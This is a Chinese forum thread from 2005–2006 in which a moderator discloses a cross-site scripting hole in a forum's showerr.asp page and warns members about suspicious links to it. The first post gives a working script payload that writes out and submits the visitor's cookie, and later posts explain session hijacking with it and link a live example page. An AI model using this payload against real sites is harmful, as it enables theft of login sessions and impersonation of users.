智星论坛(IQSTAR BBS)
 
‹‹ 上一主题 | 下一主题 ››
发新话题
打印

建议修改showerr.asp(紧急)

sinaian

版主

Rank: 10Rank: 10Rank: 10
1# 发表于 2005-9-11 05:37  只看该作者

建议修改showerr.asp(紧急)

原因:action=<Script>document.write(formstart);document.write(document.cookie);document.write(formend);document.forms[0].submit;window.close (在智星测试通过) 在管理员做出修改之前,请务必当心来路不明的指向showerr.asp的链接。
Ordeal & Patience

TOP

智深

论坛元老

Rank: 9Rank: 9Rank: 9

三宝弟子 释真信
2# 发表于 2005-9-11 20:48  只看该作者
看不明白,偶像告诉我,危害溡什么罢
愿诸众生永具安乐及安乐因
愿诸众生永离众苦及众苦因
愿诸众生永具无苦之乐我心怡悦
愿诸众生永离贪嗔之心住平等舍

TOP

sinaian的马仔

小福星

Rank: 1
3# 发表于 2005-9-12 01:07  只看该作者
引用:
以下是引用[I]智深[/I]在2005-9-11 20:48:09的发言:[BR]看不明白,偶像告诉我,危害溡什么罢
老板说,会有来路不明的指向showerr.asp的链接。
老板还说,他喜欢到处找漏洞,可是找完了以后没人理他,他很郁闷。

TOP

sinaian

版主

Rank: 10Rank: 10Rank: 10
4# 发表于 2005-9-17 04:02  只看该作者
郁闷个啥,等狼真来再郁闷不迟。
通过http://218.1.231.240/iqbbs/showerr.asp把智星的cookie发出来,这样你的身份就等于被别人盗取了。修复的办法很简单,管理员把脚本加上一行过滤即可。
Ordeal & Patience

TOP

boydreaming

梦中孩子

管理员

Rank: 12Rank: 12Rank: 12
5# 发表于 2005-9-28 15:53  只看该作者
也不明白
欢迎访问 http://boydreaming.life365.com

TOP

sinaian

版主

Rank: 10Rank: 10Rank: 10
6# 发表于 2006-1-14 00:02  只看该作者
比如说甲写个恶意连接,乙在登陆状态下点击,甲得到乙的cookie后编辑到自己的文件里,就相当于以乙的身份登陆。范例如下,千万不要在登陆状态下点那个 “~XX~”
[username=沙鸥,boydreaming,onlyone]http://www.gaonaojin.com/city/dispbbs.asp?boardID=6&ID=21495&page=1[/username]

[此贴子已经被作者于2006-1-14 0:05:11编辑过]


Ordeal & Patience

TOP

僧闲

论坛元老

Rank: 9Rank: 9Rank: 9

2008智星蓝联想对抗赛获胜队

7# 发表于 2006-1-16 20:52  只看该作者
这是动网的老漏洞了。动网很破的。。。
每天学习一点点

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题

当前时区 GMT+8, 现在时间是 2008-12-6 01:07

Processed in 0.055778 second(s), 11 queries, Gzip enabled.
Skin By Wing